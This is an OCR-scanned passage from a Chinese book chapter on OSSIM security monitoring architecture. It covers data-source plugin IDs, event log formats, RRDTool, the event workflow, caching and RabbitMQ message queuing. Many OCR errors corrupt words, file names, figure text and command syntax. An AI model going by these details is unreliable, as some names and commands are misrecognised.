1557 nortel-switch 北 电 交 换 机 /路 由 器 nortel-switch.cfg 
1558 sophos Sophos Antivirus sophos.cfg 
1559 mOnOwall mOn0wall 防火 墙 日 志 mOnOwall.cfg 
1560 pf Pf 防火 墙 日 志 pf.cfg 
1561 modsecurity ModSecurity modsecurity.cfg 
1562 vmware_workstation Vmware Workstation vmware-workstat 

ion.cfg 
1563 optenet antispam optenet antispam optenet.cfg 
1565 isa-server Microsoft ISA 防火 墙 isa.cfg 
1566 aladdin Aladdin eSafe 内 容 过 滤 产 品 aladdin.cfg 
1567 avast Avast Antivirus. 反 病 毒 软件 avast.cfg 
1568 bro-ids Bro-IDS bro-ids.cfg 
1569 dragon Enterasys Dragon 凯 创 入 侵 检测 系统 dragon.cfg 
1570 honeyd Honeyd H0 S RA honeyd.cfg 
1571 mcafee McAfee Antivirus mcafee.cfg 
1572 sidewinder Sidewinder firewall (BSD based) sidewinder.cfg 
1573 sonicwall SonicWALL 防火 墙 套件 sonicwall.cfg 
1574 trendmicro Trend Micro Messaging Security 趋势 科技 安 trendmicro.cfg 

全 套件 

1575 cyberguard Cyberguard-SG565 防火 墙 cyberguard.cfg. 
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( 续 表 ) 
Plugin_sid ZFR 数据 源 描述 插件 
1576 vsftp VSFTP 服务 vsftpd.cfg 
1577 bind BIND 服务 bind.cfg 
1578 Panda-AS Panda AdminSecure 熊猫 安全 卫士 panda-as.cfg 
1579 hp-eva HPEVA 存储 管理 工具 hp-eva.cfg 
1580. webmin Webmin 服务 webmin.cfg 
1581 raslogd RASlog - Brocade Fabric 博 科 交换 机 raslogd.cfg 
1582 serviceguard HP Service Guard Cluster serviceguard.cfg 
1583 sitescope HP SiteScope 监控 工具 sitescope.cfg 
1584 DHCP Microsoft DHCP 客户 端 服 务 日 志 dhcp.cfg 
1586 openldap. OpenLDAP openldap.cfg 
1587 quidguard Squid 过 滤 工 具 squidGuard.cfg 
1588 lucent-brick Lucent Brick 阿尔 卡特 朗讯 防火 墙 lucent-brick.cfg 
1589. radiator Radiator RADIUS 认证 服务 器 radiator.cfg 
1591 ironport IRON PORT 思科 邮件 网 关 ironport.cfg 
1592 fidelis FidelisIBM 数据 泄露 防护 系统 fidelis.cfg 
1594 cisco-acs-sidb Cisco-ACS-4-SIDB 思科 AAA 认证 系统 | cisco-acs.cfg 
1595 juniper-netscreen-idp Juniper NetScreen 入 侵 防 御 系 统 | juniper-idp.cfg 
1596 Kismet Kismet 开源 Wireless IDS kismet.cfg 
1597 cisco-ips Cisco IPS cisco-ips.cfg 
1598 Symantec Symantec symantec-ams.cfg 
1603 Exchange Exchange Server 日 志 exchange.cfg 
1605 PandaSE Panda 能 猫 安 全 企业 防 病毒 套件 panda-se.cfg 
1607 linuxdhcp Linux DHCP Service linuxdhcp.cfg 
1608 allot Allot NetEnforcer 流量 控制 设备 allot.cfg 
1609 Juniper- VPN Juniper VPN | juniper-vpn.cfg 
1610 vyatta Vyatta events vyatta.cfg 
1611 Siteprotector Siteprotector IDS siteprotector.cfg 
1612 tippingpoint 3COM Tippingpoint 入 侵 防御 系统 tippingpoint.cfg 
1614 f5 F5 负载 均衡 设备 f5.cfg 
1615 paloalto PaloAlto 防火 墙 | paloalto.cfg 
1616 | _ pureftpd FTP 服务 | pureftpd.cfg 
1617 courier Courier 邮件 服务 器 courier.cfg 
1618 Mcafee-AntiSpam Mcafee AntiSpam mcafee-antispam.cfg 
1619 SymantecEPM SymantecEPM: Symantec AV Server symantec-epm.cfg 
1621 Fortiguard Fortiguard IPS fortiguard.cfg 
1623 Aruba Aruba Wireless aruba.cfg 
1626 Juniper-SRX Juniper-SRX Router/Firewall/IDS/IPS — | juniper-srx.cfg 
1630 bit9. Bit9 可 信安 全 平台 bit9.cfg 
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( 续 表 ) 
Plugin sid 名 称 数据 源 描述 插件 
1631 NFS 服务 nfs.cfg 
1632 WU-FTP 服务 wuftp.cfg 
1633 motorola firewall Motorola 防火 墙 motorola-firewallcfg | 
1635 netscreen-igs Netscreen Device. netscreen-igs.cfg 
1636 cisco-asa Cisco ASA 思科 硬件 防火 墙 cisco-asa.cfg 
1640 usbudev USB Udev 硬件 检测 usbudev.cfg 
1642 bluecoat Blue Coat 硬件 代理 服务 器 bluecoat.cfg 
1643 stonegate ips Stonegate IPS stonegate ips.cfg 
1646 netkeeper-fw NetKeeper 防火 墙 netkeeper-fw.cfg 
1647 netkeeper-nids NetKeeper 基于 网 络 的 IDS 设备 netkeeper-nids.cfg 
1648 dovecot Dovecot 开源 邮件 服务 器 dovecot.cfg 
1649 aix-audit IBM AIX Audit 服务 aix-auditcfg 
1651 oracle-syslog ORACLE Syslog oracle-syslog.cfg 
1652 cisco-nexus-nx-os Cisco Nexus 思科 数据 中 心 级 交换 机 cisco-nexus-nx-os.cfg 
1653 cisco-ace Cisco ACE cisco-ace.cfg 
1654 snare-mssgl MSSQL Server snare-mssgl.cfg 
1656 cisco-ips-syslog Cisco IPS cisco-ips.cfg 
1657 cisco-3030 Cisco VPN cisco-3030.cfg 
1658 vmware-vcenter VMware Vcenter vmware-vcenter.cfg 
1660. ascenlink-network Xtera AscenLink 网 络 负载 均衡 器 ascenlink.cfg. 
1663 cisco-wlc Cisco 2000 系列 无 线 网 控制 器 cisco-wlc.cfg 
1664 axigen Axigen 邮件 服务 器 axigen-mail.cfg 
1665 tacacs-plus TACACS+ tacacs-plus.cfg 
1666 smbd Smbd: Samba 服务 smbd.cfg 
1667 GlastopfNG GlastopfNG Web Kriti edi ate | glastopng.cfg 
1669 dionaea Dionaea St dionaea.cfg. 
1670 cisco-asr. Cisco-ASR 1000 系列 路 由 器 cisco-asr.cfg 
1672 extreme-switch Extreme Switch extreme-switch.cfg | 
1673 extreme-wireless Extreme Wireless extreme-wireless.cfg | 
1674 f5-firepass F5 Firepass 远程 访问 软件 15-firepass.cfg 
1675 drupal-wiki Drupal PHP 编写 的 开源 内 容 管 理 框架 drupal-wiki.cfg 
1677 siris-vshell VanDyke Vshell 远程 连接 、 终 端 访问 工具 | siris-vshell.cfg 
1678 citrix-netscaler Citrix NetScaler 负载 均衡 器 citrix-netscaler.cfg 
1679 imperva-securesphere Imperva SecureSphere WAF 产品 imperva-securesph 

ere.cfg 

1680 sendmail Sendmail sendmail.cfg 
1682 proxim-orinoco Proxim ORINOCO AP700 无 线 接 入 设备 proxim-orinoco.cfg 
1683 prads Passive RealTime Asset Detection System — | prads.cfg 
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( 续 表 ) 
Plugin sid — 名称 数据 源 描述 插件 
1684 AlteonOS Alteon 北 电 alteon 2424 负载 均衡 交换 机 | alteonos.cfg 
1685 Suhosin PHP 保护 系统 suhosin.cfg 
1686 vmware-esxi Vmware ESXi server vmware-esxi.cfg 
1687 monit Monit Plugin monit.cfg 
1688 Storage IBM storwizeV7000 存储 产品 storewize-V7000.cfg 

StorewizeV7000 

1689 W2003DNS MS Windows Server 2003 DNS 日 志 W2003DNS.cfg 
1690. Aruba-6.x HP Aruba Wireless aruba-6.cfg 
1691 Watchguard Watchguard Firebox watchguard.cfg 
1802 wmi-system-logger Wmi-Windows: Agent for Windows wmi-systen-logger.cfp 
2004 opennms OpenNMS 监控 系统 opennms-monitor.cfg 
2006 tcptrack teptrack tcptrack-monitor.cfg 
2008 nmap-monitor Nmap 扫描 工具 nmap-monitor.cfg 
2009 ping-monitor ping-monitor | ping-monitor.cfg 
2010 Whois whois-monitor.cfg 
2012 wmi-monitor wmi-monitor.cfg 
2013 OCS-Monitor OCS inventory monitor ocs-monitor.cfg 
3001 Em — Nessus nessus.cfg 
3002 Nmap nmap-monitor.cfg 
4001 osiris Osiris 基于 主机 的 IDS 系统 osiris.cfg 
4003 sshd SSH ssh.cfg 
4004 pam unix Pam pam unix.cfg 
4005 sudo Sudo sudo.cfg 
4007 syslog Syslog 日 志 记录 器 syslog.cfg 
6001 ossim-agent ossim-agent ossim-agent.cfg 
7007 Ossec Ossec 日 志 收 集 ossec-single-line.cfix 
8001 suricata Suricata HTTP Event suricata-http.cfg 
9555 Fortimail Fortinet / Fortimail 邮件 网 关 fortimail.cfg 
19004 websense Websens Web 安全 网 关 websense.cfg 


Sensor 中 所 列 出 的 每 个 插件 都 是 一 个 数据 源 ， 通 过 它 来 处 理 日 志 的 标准 化 ， 在 本 书 第 7 
章 日 志 收集 与 分 析 中 ， 分 析 Linux 服务 和 设备 的 日 志 ， 将 会 用 到 此 表 中 的 内 容 。 
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分 布 式 OSSIM 系统 中 , 各 组 件 的 通信 从 一 级 控制 中 心 到 二 级 节点 , 再 到 数据 采集 的 Agent 
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之 间 都 需要 信息 交互 ， 它 们 之 间 相 互 传递 的 信息 包括 事件 、 状 态 、 命 令 及 配置 文件 发 布 等 。 
OSSIM 系统 从 不 同 设备 接收 的 事件 日 志 大 致 分 为 普通 事件 、MAC 事件 、 操 作 系统 事件 和 服务 
事件 这 4 种 类 型 ， 下 面 分 别 以 这 几 种 类 型 事件 日 志 格式 进行 说 明 。 


1.4.1 普通 日 志 举 例 


event type-"detector" date-"2012-08-09 12:12:11" plugin id-"4003" 
plugin sid-"1" sensor-"192.168.150.10" interface-"eth0" priority-"1" 
Src ip-"192.168.150.8" dst ip-"192.168.150.8" data-"userl" log-"Aug 9 12:12:11 
ossim-sensor sshd[6567]: (pam unix) authentication failure; logname- uid-0 euid-0 
tty-ssh ruser- rhost-localhost user-userl" 


各 区 域 含义 如 下 : 


Type: 事件 类 型 一般 有 两 种 类 型 Detector 或 Monitor. 

Date: 从 设备 接收 日 志 的 时 间 。 

Sensor: 传感器 IP 地 址 。 

Interface: 网 络 接口 。 

plugin_id: 称 为 插件 ID 或 安全 插件 号 ， 表 示 产 生 这 个 事件 的 插件 ， 也 就 是 可 用 于 区 
分 是 哪个 NIDS 或 扫描 设备 产生 的 事件 ， 这 里 plugin_id=4003， 代 表 SSHd:Secure 
Shsell daemon. 

€ plugin sid: 称 为 SID 或 安全 事件 号 ， 用 于 表示 安全 事件 在 插件 中 的 事件 类 型 ， 可 用 
于 区 分 同一 探 针 探测 到 的 不 同事 件 类 型 ， 插 件 的 子 ID 在 OSSIM 4.1 中 在 菜单 
Deployment- Collection 下 的 DS Groups 选项 查询 ， 打 开 顺 序 见 图 1-39 中 的 箭头 所 示 
1-4 个 步骤 。 其 中 数据 源 插件 也 是 以 此 插件 为 基础 。 其 数据 源 描 述 如 图 1-39 所 示 。 
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139 数据 源 描述 信息 


14.2 plugin id 一 对 多 关系 
每 个 插件 代表 对 一 种 数据 源 采 集 的 定义 ， 数 据 采集 Agent 通过 插件 定义 的 内 容 分 析 日 志 ， 
在 此 过 程 中 添加 事件 的 plugin id、plugin_sid， 这 样 对 该 事件 进行 唯一 地 标识 。 由 于 安全 设备 
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往往 能 产生 多 种 类 型 安全 事件 ， 所 以 plugin id 标识 的 插件 对 应 多 个 plugin sid 事件 。 

如 果 使 用 了 OSSM 4.8 以 上 版 本 ， 那 么 打开 方式 和 上 面 介绍 的 有 所 不 同 ， 路 径 为 
Configuration 一 Threat Intelligence 一 Data Source， 选 择 EEEETEET 本 拉 钮 ， 如 图 1-40 所 示 。 虽 
然 外 观 变化 了 ， 但 一 些 参数 有 着 共性 ， 其 含义 需要 大 家 理解 。 
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图 1-40 数据 源 描述 


€ Priority: 优先 级 (0 为 最 低 ，5 为 最 高 ) 。 当 修改 了 插件 的 优先 级 之 后 ，risk 会 变化 
从 而 影响 到 事件 报警 ， 如 果 需 要 恢复 初始 状态 ， 可 以 在 Web UI 的 Threat Intelligence 
一 Data Source 菜单 下 单 击 “Restore Plugins” 按 钮 。 

€ Timestamp: IIIR. 

€ Protocol: 协议 类 型 ， 有 三 种 协议 类 型 : TCP, UDP, ICMP. 

€ Src ip: 源 IP 地 址 。 

€ Src port: 源 端口 。 

€ Dst ip: 目标 卫 地 址 。 

€  Dst port: 目标 端口 。 


46 


第 1 章 OSSIM 架构 与 原理 


€ Log: 日 志 内 容 。 


1.4.3. MAC 事件 日 志 举 例 


host-mac-event host-"192.168.150.8" interface-"ethl" mac-"00:24:80:fb:bc" 
vendor-"Intel Corporation" date-"2012-03-17 11:30:09" sensor-"192.168.150.11" 
plugin id-"1512" plugin sid-"1" log-"ip address: 192.168.150.2 interface: eth0 
ethernet address: 0:4:23:88:fb:8b ethernet vendor: Intel Corporation timestamp: 
Friday, March 17, 2012 11:30:09 +0100" 


各 区 域 含义 如 下 : 

host: 主机 的 MAC 发 生 改 变 的 IP 地 址 。 
mac: 十 六 进 制 表示 的 网 卡 物理 地 址 。 
vendor: 网 卡 厂 家 。 

sensor: Sensor 的 卫 地 址 。 

interface: 网 卡 接口 。 

date: 事件 当前 日 期 和 时 间 。 


14.4 ”操作 系统 事件 日 志 举例 


host-os-event host-"192.168.150.8" os-"Windows" date-"2012-12-20 02:50:13" 
sensor-"192.168.150.10" plugin id-"1511" plugin sid-"1" log-"Windows XP" 
interface-"eth0" 


各 区 域 含义 如 下 : 

€ host IP 地 址 或 主机 名 称 。 

os: 操作 系统 。 

sensor: Sensor 的 IP 地 址 。 

interface: 网 卡 接口 。 

date: 日 期 时 间 。 

plugin id: 操作 系统 的 pluginID 通常 为 1511， 它 表示 Passive OS Fingerprinting Tool, 
POFLE. 


1.4.5 “系统 服务 事件 日 志 举例 


host-service-event host-"192.168.150.77" sensor-"192.168.150.10" 
interface-"eth0" port-"80" protocol-"6" service-"www" application-"CCO/4.0.3 
(Unix) tomcat" date-"2012-03-27 07:59:54" plugin id-"1516" plugin sid-"1" 
log-"test log" 


各 区 域 含义 如 下 : 
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host: 地 址 或 主机 名 称 。 

sensor: Sensor 的 也 地 址 。 

interface: 噢 探 网 卡 。 

port: 端口 。 

protocol: 协议 号 。 

service: 服务 种 类 (例如 WWW、SSH 以 及 FTP 等 ) 。 

application: 指定 应 用 所 对 应 的 服务 。 

date: 日 期 时 间 。 

plugin id: 系统 服务 ID 通常 显示 1516 ( 这 代表 pads 服务 ， 属 于 网 络 发 现 服务 ， 全 
称 为 Passive Asset Detection System ) . 


在 系统 报告 的 事件 中 ,插件 ID 定义 插件 的 类 型 ， 我 们 要 在 何 处 才能 找到 它 所 有 对 应 的 id 
呢 ? 在 图 1-41 所 示 中 的 查询 对 话 框 中 输入 id 号 就 可 以 方便 查 到 插件 用 途 。 


DASHBOARDS ANALYSIS. ENVIRONMENT REPORTS 


EX 


1518 


图 1-41 通过 插件 ID 号 查看 插件 


另外 ， 在 命令 行 下 查询 详情 ， 例 如 ID:2523， 通 过 以 下 命令 实现 。 
#grep sid:2523 /etc/snort/rules/* 


RRDTool 绘图 引擎 


OSSIM 平台 中 Nagios 服务 的 监控 数据 来 源 于 RRDtool， 而 且 其 中 Ntop、Munin、Netflow 
等 重要 服务 的 数据 ， 同 样 来 源 于 RRDtool。 这 些 服务 共同 使 用 了 RRD Tool 工具 来 存储 Nagios 
性 能 数据 。 因 为 通过 RRD Tool， 能 够 根据 先前 存储 的 数据 指标 创建 时 序 图 形 ， 根 据 这 些 网 形 
IT 运 维 人 员 能 轻易 发 现 某 个 时 间 段 内 ， 设 备 的 监测 信息 所 发 生 的 变化 趋势 ， 可 以 推断 出 过 去 
某 个 时 间 点 ， 某 个 特定 服务 的 工作 状态 如 何 。 例 如 某 服务 器 CPU 负载 监控 截图 显示 出 ， 在 午 
夜 出 现 了 短暂 峰值 , 通过 监控 图 像 可 发 现 该 现象 是 偶然 还 是 经 常 发 生 ， 从 而 推测 这 种 现象 背后 
所 隐藏 的 问题 。 
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人 145:1 B2 

RRD Tool 是 OSSIM 系统 中 的 绘图 引擎 之 一 ， 它 用 于 系统 绘制 各 类 监控 图 表 ， 它 的 前 身 
是 MRTG， 但 比 MRTG 更 灵活 。RRD Tool 代表 “Round Robin Database Tool”， 平 时 常 说 的 
RRD 就 是 指 Round Robin Database。 

这 里 所 谓 的 “Round Robin” 是 一 种 存储 数据 方式 ， 它 使 用 固定 的 空间 存储 数据 ， 并 有 一 
个 指针 指向 最 新 的 位 置 。 可 以 把 用 于 存储 数据 的 空间 看 成 一 个 圆 ， 上 面 有 很 多 刻度 ， 这 些 刻度 
所 在 的 位 置 就 代表 用 于 存储 数据 的 地 方 。 

为 什么 要 将 RRD Tool 单独 拿 出 来 讲 ? 因为 在 OSSIM 很 多 组 件 (Nagios、Munin、Ntop、 
Netflow 等 ) 的 图 形 生 成 都 与 它 有 关 。RRD 诞生 之 前 ，MRTG 一 直 是 图 形 化 设备 利用 率 数 据 的 
行业 标准 ，MRTG 在 系统 指标 收集 和 存储 中 引入 了 RRD 的 概念 ， 

数据 源 是 OSSIM 里 重要 的 概念 ， 这 里 为 大 家 介绍 的 数据 源 基于 Nagios， 从 系统 负载 到 网 
络 接口 每 秒 吞 吐 量 , RRD Tool 将 这 些 数 据 源 存储 进来 , 单独 的 RRD 文件 能 够 保存 用 户 的 大 量 
数据 ， 这 些 数据 可 以 存储 在 数据 库 中 。OSSIM 系统 的 Nagios、Ntop 以 及 Netflow 子 系统 中 ， 
将 数据 存储 在 RRD Tool， 用 户 可 以 通过 命令 行 工具 进行 处 理 。 


1.5.2 RRD Tool 与 关系 数据 库 的 不 同 
RRDTool 不 但 具有 绘图 功能 还 具有 数据 的 存储 功能 读者 可 将 RRDTool 理解 为 数据 库 ， 
它 与 关系 型 数据 库 相 比 ， 区 别 如 下 : 
(1) 用 RRD 的 存储 格式 数据 可 以 重复 利用 而 其 他 的 数据 库 只 能 被 动 接收 数据 RRDTool 
可 以 对 收 到 的 整 型 数据 进行 计算 ， 如 计算 两 个 数据 的 变化 程度 并 存储 结果 、 将 一 个 RRD 文件 
中 的 数据 与 另外 一 个 RRD 文件 的 数据 相 加 。 例 如 : 在 Nagios 可 绘制 最 近 10 分 钟 的 负载 ， 我 
们 可 以 使 用 RRDTool 抓 取 模式 ， 使 用 代码 : 
rrdtool graph /dev/null -start-end-600 
'DEF:foo-serverl load.rrd:avg5min:AVERAGE' 'PRINT:foo:AVERAGE:$1f' |tail -nl 
利用 以 上 脚本 进行 数据 分 析 ， 因 为 数据 点 原本 为 5 分 钟 的 平均 值 ， 所 以 我 们 还 需要 计算 
最 近 两 个 数据 点 的 平均 值 这 样 做 比较 复杂 我 们 可 以 利用 以 上 的 代码 通过 RRD Tool 的 graph 
命令 调用 RRD Tool 获取 平均 值 并 将 其 通过 标准 输出 〈stdout) 输出 。 
(2) RRD Tool 的 RRD 文件 为 固定 大 小 ， RRD 文件 不 会 像 其 他 关系 型 数据 库 文 件 那样 随 
着 时 间 延 长 而 增 大 ， 因 此 RRDTool 文件 的 存储 能 力 有 限 ， 不 能 存放 大 量 数 据 。 
(3) RRD Tool 数据 库 要 求 定时 获取 数据 ， 而 关系 型 数据 库 则 没有 这 个 要 求 ， 如 果 在 某 个 
时 间 间 隔 内 没有 收 到 数据 ， 则 会 用 UNKN Cunknow) 代替 。 


1.5.8 RRD 绘图 流程 
RRDTool 绘图 主要 是 通过 3 个 流程 完成 ， 分 别 是 创建 RRD 文件 、 更 新 RRD 数据 和 绘 出 
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图 形 。 在 整个 过 程 中 更 新 RRD 数据 和 画图 是 在 指定 的 时 间 内 重复 执行 。 由 于 RRDTool 制图 
的 过 程 比较 复杂 ， 作 为 普通 用 户 无 须 了 解 RRDTool 的 复杂 原理 和 命令 就 可 以 通过 OSSIM F 
台中 配置 好 的 RRDTool 工具 绘制 出 各 种 监测 图 形 。 


OSSIM 工作 流程 
介绍 完 OSSIM 系统 组 件 之 后 ， 下 面 讲解 其 工作 流程 ， 主 要 包括 以 下 9 个 方面 的 内 容 : 


(1) 作为 整个 系统 的 安全 插件 的 探测 器 〈Sensor) 执行 各 自 的 任务 ， 当 发 现 问题 时 会 给 
予 报警 ; 

(2) 各 探测 器 的 报警 信息 将 被 集中 采集 ; 

G) 将 各 个 报警 记录 解析 并 存 入 事件 数据 库 (EDB); 

(4) 根据 设置 的 策略 (Policy) 给 每 个 事件 赋予 一 个 优先 级 (Priority)， 优 先 级 在 OSSIM 
系统 中 为 事件 管理 重要 的 要 素 , 事件 的 优先 级 决定 了 处 理事 件 顺 序 和 所 需要 的 资源 , 也 就 是 越 
紧急 的 事件 优先 级 越 高 ， 需 要 系统 响应 时 间 越 短 ; 

(5) 对 事件 进行 风险 评估 ， 为 每 个 警报 计算 出 风险 值 ; 

(6) 将 设置 优先 级 的 事件 发 送 至 关联 引擎 ， 关 联 引擎 将 对 事件 进行 关联 ， 关 联 引擎 就 是 
在 入 侵 检 测 传 感 器 上 报 的 告警 事件 的 基础 上 , 经 过 关联 分 析 形 成 入 侵 行为 判定 , 并 将 关联 分 析 
结果 报 送 控 制 台 ; 

(7) 对 一 个 或 多 个 事件 进行 关联 分 析 后 ,关联 引擎 生成 新 的 报警 记录 ,将 其 赋予 优先 级 ， 
并 进行 风险 评估 ， 存 入 数据 库 ; 

(8) 用 户 监 视 器 将 根据 每 个 事件 产生 实时 的 风险 图 ; 

(9) 在 控制 面板 中 给 出 最 近 的 关联 报警 记录 ， 在 底层 控制 台中 提供 全 部 的 事件 记录 。 


缓存 与 消息 队列 


17.4 缓存 系统 
OSSIM 系统 在 采用 缓冲 和 缓存 框架 来 提高 系统 响应 的 速度 。 


(1) Memcached 
Memcached 是 一 套 高 性 能 分 布 式 的 缓存 系统 ， 用 于 动态 Web 应 用 ， 以 减轻 后 台数 据 服务 
器 负载 。 对 于 Memcached 本 身 细节 ， 这 里 就 不 涉及 太 多 了 ， 上 毕竟 这 不 是 本 书 的 重点 。 下 面 我 
们 重点 看 看 如 何 通过 Memcached 来 帮助 我 们 提升 数据 服务 的 扩展 性 。 要 将 Memcached 整合 
到 系统 架构 中 ， 首 先 要 在 应 用 系统 中 让 Memcached 有 一 个 准确 的 定位 。 仅 作为 提升 数据 服务 
性 能 的 一 个 Cache TR, 还 是 让 它 与 MySQL 数据 库 较 好 地 融合 在 一 起 成 为 一 个 更 为 高 效 的 数 
据 服务 层 ， 更 多 的 操作 请 参考 我 的 博客 《Memcache 与 MySQL 并 肩 作战 》 一 文 。 
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(2) 作为 提升 系统 性 能 的 Cache 工具 

只 是 系统 通过 Memcached 来 提升 系统 性 能 ， 作 为 Cache 软件 ， 那 么 更 多 的 是 需要 通过 应 
用 程序 来 维护 Memcached 中 的 数据 与 数据 库 中 数据 的 同步 更 新 。 这 时 的 Memcached 基本 可 
以 理解 MySQL. 数据 库 前 端的 Cache 层 。 这 样 最 大 的 好 处 在 于 可 以 做 到 完全 不 用 动 数据 库 相 
关 的 架构 ， 所 有 数据 都 会 写 入 MySQL Master 中 ,包括 数据 第 一 次 写 入 时 候 的 INSERT， 同 时 
也 包括 对 已 有 数据 的 UPDATE 和 DELETE. OSSIM 2.3 版 中 比较 适用 于 需要 缓存 对 象 类 型 少 ， 
而 需要 缓存 的 数据 量 又 比较 大 的 环境 , 是 一 个 快速 有 效 的 完全 针对 性 能 问题 的 解决 方案 。 稍 后 
再 介绍 memcached 性 能 监控 。 


(3) Squid Cache 
Squid Cache 是 目前 应 用 广泛 的 Web 缓存 服务 ， 可 以 作为 前 置 缓存 服务 器 来 缓存 相关 的 请 
求 数据 。OSSIM 中 利用 在 Apache 前 端 使 用 Squid Cache 作为 反 向 代理 , 提供 文件 内 容 的 缓存 ， 
以 提高 系统 效率 。 


1.7.2 ”消息 队列 处 理 

企业 日 志 数 量 正在 以 指数 级 形式 高 速 增长 , 日 志 数 据 的 具有 海量 、 多 样 、 异 构 等 特点 ， 基 
于 传统 的 单一 节点 混合 式 安装 的 OSSIM 平台 GR OSSIM 4.4 及 以 下 系统 )， 无 法 满足 海量 日 
志 分 析 要 求 。 在 OSSIM 4.4 以 后 的 系统 中 增加 了 中 间 件 RabbitMQ， 通 过 RabbitMQ 将 系统 中 
各 组 件 解除 耦合 ， 避 免 了 系统 中 运行 模块 的 影响 〈 例 如 MySQL 的 写 操作 等 )， 这 样 设计 可 实 
现 分 布 式 日 志 分 析 平台 的 要 求 。 

在 网 络 出 现 故 障 前 或 故障 过 程 中 , 各 种 设备 和 服务 器 会 发 送 大 量 日 志 到 日 志 服务 器 , 在 原 
先 的 设计 中 ， 这 样 的 日 志 会 直接 写 入 数据 库 或 者 /varlog 的 某 个 文件 中 ， 在 故障 状态 下 的 高 并 
发 情形 下 ,会 对 数据 库 服务 器 造成 巨大 的 压力 , 这 是 在 进行 日 志 查 询 操作 时 ， 变 得 相应 延迟 加 
剧 ， 很 容易 就 超过 了 系统 的 最 大 负载 。 

如 图 1-42 所 示 为 早期 日 志 收 集 的 方案 ,在 图 中 PHP 脚本 从 数据 库 中 读 取 数 据 的 典型 流程 ， 
此 图 包括 打开 数据 库 连接 、 运 行 任意 SQL 语句 、 读 取 SQL 语句 找到 的 结果 、 关 闭 数据 库 连接 ， 
最 后 在 HTML 页 面 上 将 所 获取 的 内 容 显 示 给 用 户 。 

从 查询 中 获取 关闭 数据 库 ro 
结果 连接 


图 1-42 没有 缓存 情况 下 从 数据 库 中 获取 数据 流程 


上 述 实例 中 ， 每 个 步骤 都 存在 瓶颈 ， 数 据 库 可 能 未 调整 为 最 佳 运行 状态 ，SQL 语句 使 用 
的 数据 表 可 能 未 被 优化 ,其 中 还 有 很 多 需要 管理 员 注意 的 地 方 。 如 果 没有 缓存 , 用 户 在 每 次 请 
R PHP 脚本 时 都 会 碰 到 问题 , 每 次 都 会 导致 性 能 降低 ,如果 使 用 缓存 来 存储 SQL 语句 的 结果 ， 
这 种 性 能 的 损耗 将 不 复 存 在 。 


运行 SQL 语句 在 


打开 数据 库 连 接 
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如 何 解决 这 种 问题 呢 ， 在 OSSIM 中 采用 异步 操作 的 方式 ， 其 核心 思想 就 是 消息 队列 (在 
OSSIM 系统 中 ,消息 Message 是 由 通信 的 双方 所 需要 传递 的 日 志 消息 )， 通 过 消息 队列 ， 将 短 
时 间 高 并 发 产生 的 日 志 消 息 , 存储 在 消息 队列 中 ， 从 而 削 平 高 峰 期 的 并 发 事务 , 这样 可 以 有 效 
抵御 大 量 涌 入 的 日 志 ， 对 单机 数据 库 系统 的 冲击 ， 也 就 相对 改善 了 数据 库 系统 性 能 。 

以 OSSIM 中 的 SIEM 事件 存储 来 说 明 问 题 ， 设 备 将 日 志 发 送 到 Sensor， 经 过 归 一 化 处 理 
之 后 发 往 OSSIM Server， 关 联 引擎 对 其 继续 加 工 ， 会 同时 将 数 个 任务 收集 事件 写 到 数据 库 ， 
因此 数据 库 写 入 量 很 大 ， 当 同时 查询 时 并 发 操作 将 严重 占用 有 限 的 IO 通道 。 

由 于 关联 引擎 的 业务 逻辑 的 处 理 比较 复杂 ,往往 MySQL 数据 库 的 写 操作 量 更 大 ， 所 以 在 
OSSIM 4.0 之 前 系统 中 没有 采用 消息 队列 时 ， 大 负荷 时 往往 系统 响应 迟缓 。 

但 OSSIM 4.4 之 后 采用 消息 队列 的 思想 ， 重 构 了 系统 之 后 ， 加 入 了 消息 队列 服务 器 ， 结 
构 如 图 1-43 所 示 。 


Switch 
^u, 
— —À| 
Router t 
^ Sensor 一 -一 EN 
P r ~ 
一 Redis OSSI Sewer ^. 
一 7 E 
Server 发 
z 收 
x 人 向 
APP Server " X < /应 
请 
浏览 器 访问 OSSIM 
的 Web 卉 面 


1-43 引入 消息 队列 机 制 


消息 队列 服务 器 中 有 一 个 进程 单独 对 消息 队列 进行 处 理 , 首先 判断 消息 队列 中 是 否 有 待 处 
理 的 消息 ， 如 果 有 的 话 ， 那 么 将 其 取出 ， 并 进行 相应 地 处 理 。 消 息 队 列 处 理 流程 如 图 1-44 所 
示 , 就 这 样 通过 消息 队列 将 高 并 发 用 户 请 求 进行 异步 操作 , 然后 逐一 对 消息 队列 进行 出 队 同 步 
操作 ， 也 避免 了 并 发 控制 的 难题 。 


Message In 
BESgI 日 志 消息 2 日 志清 总 3 EEU 
队列 Queue 
144 消息 队列 


Message Out 
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消息 队列 只 是 解决 并 发 问题 的 其 中 一 种 方式 ， 在 OSSIM 中 往往 需要 结合 多 种 不 同 的 技术 
方式 来 共同 解决 ， 比 如 负载 均衡 、 反 向 代理 等 方案 。 这里， 虽然 以 异常 日 志 为 例 ， 但 是 “麻雀 
虽 小 五 脏 俱全 ”， 日 志 写 入 文件 的 高 并 发 操作 也 同样 适用 于 数据 库 的 高 并 发 ， 所 以 研究 该 案例 
具有 一 定 指导 意义 。 


1.7.3 RabbitMQ 
RabbitMQ 是 实现 AMQP (高 级 消息 队列 协议 ) 消息 中 间 件 的 一 种 ， 它 是 消息 中 间 件 的 开发 
标准 ， 与 平台 无 关 ， 现 用 于 OSSIM 分 布 式 系统 中 存储 转发 消息 ， 其 工作 原理 如 图 1-45 所 示 。 


MySQL 
xm eo Mongodb 
m RabbitMQ 

Redis 


图 1-45. OSSIM 消息 队列 原理 


为 什么 要 使 用 RabbitMQ? 在 高 并 发 情况 下 ，RabbitMQ 在 处 理发 送 和 接收 请 求 时 响应 非 
常 快速 ， 而 且 对 其 性 能 调 优 后 ， 系 统 响应 速度 还 会 有 所 提高 。RabbitMQ 使 用 Erlang 编写 的 
AMQP 服务 器 ， 而 AMQP 基于 客户 端 / 代 理 模 式 。 

在 大 数据 日 志 分 析 应 用 中 , 我 们 常 将 OSSIM 做 成 集群 模式 , 因为 这 样 可 以 使 用 RabbitMQ 
的 集群 功能 。 另外 , RabbitMQ 的 集群 中 有 两 种 节点 : 内 存 节点 与 磁盘 节点 。 对 于 每 个 RabbitMQ 
节点 ， 根 据 日 志 种 类 建立 相应 的 队列 ， 并 且 根 据 日 志 种 类 的 名 称 建立 exchange 的 key 值 (后 
面 再 介绍 )。RabbitMQ 通信 端口 为 5672。 

OSSIM 中 我 们 通过 以 下 命令 查看 端口 。 


#netstat -na |grep 5672 
tep 01001127-0-0.1:52667 127.0.0.1:5672 ESTABLISHED 


